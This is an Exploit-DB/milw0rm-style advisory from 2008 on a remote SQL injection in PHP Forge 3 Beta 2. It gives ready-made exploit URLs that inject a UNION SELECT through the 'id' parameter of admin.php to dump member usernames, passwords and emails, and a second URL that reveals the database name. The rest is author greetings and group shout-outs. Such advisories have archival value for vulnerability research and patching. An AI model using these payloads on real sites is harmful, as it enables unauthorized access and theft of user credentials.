PHP Forge 3 Beta 2 - 'id' SQL Injection

EDB-ID:

5504


Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2008-04-26


=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Forge 3.0 bêta
# Bug   : Remote SQL Injection Vulnerability
# Download  : http://membres.lycos.fr/phpforge/downloads/phpforge3b2.tar.gz
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
# Ex :
http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1  union  select  0,1,database(),3,4,5,6,7  from  membres--
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
=========================================================

# milw0rm.com [2008-04-26]